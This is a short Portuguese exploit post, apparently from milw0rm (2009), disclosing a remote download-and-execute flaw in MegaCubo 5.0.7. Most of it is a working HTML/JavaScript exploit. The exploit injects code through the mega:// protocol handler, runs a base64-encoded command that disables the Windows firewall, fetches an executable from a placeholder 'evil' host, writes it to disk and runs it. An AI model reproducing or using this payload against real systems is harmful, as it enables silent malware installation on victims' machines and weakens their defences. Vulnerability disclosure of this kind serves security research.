Data 01/01/2009
Nova Vulnerabilidade encontrada no software de entretenimento MegaCubo. Esta nova vulnerabilidade presente na versão 5.0.7 permite que seja executado de forma remota o download e execução de programas ou codigos maliciosos nas maquinas com o software instalado.
abaixo segue o código do exploit que explora esta vulnerabilidade.
<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
// disable firewall encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
// shell code
window.location=shellcode;
</script>
</body>
</html>
# milw0rm [2009-01-01]


